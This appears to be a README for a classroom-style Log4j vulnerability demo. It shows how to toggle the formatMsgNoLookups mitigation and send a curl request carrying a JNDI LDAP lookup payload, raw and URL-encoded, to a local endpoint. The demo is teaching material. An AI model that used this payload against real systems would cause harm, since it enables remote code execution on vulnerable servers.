log4j-vulnerability
Log4J Vulnerability demo & PPT
How to run application?
To avoid vulnerability
mvn spring-boot:run -Dspring-boot.run.jvmArguments="-Dlog4j2.formatMsgNoLookups=true"
To enable vulnerability
mvn spring-boot:run -Dspring-boot.run.jvmArguments="-Dlog4j2.formatMsgNoLookups=false"
PPT
Normal invocation and logging:
curl http://localhost:8080/api/vulnerability?name=aman
Vulnerable invocation:
jndi_url: ${jndi:ldap://127.0.0.1:3800}
jndi encoded url: %24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3800%7D
Execute below curl in terminal/postman
curl http://localhost:8080/api/vulnerability?name=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3800%7D
When you execute this curl, it will try to reach that ldap server and get information from that ldap query that's a log4j zero-day vulnerability.
Here in this example, It will throw connection refused exception because we don't have reachable ldap server. But in real scenario it would be reachable server.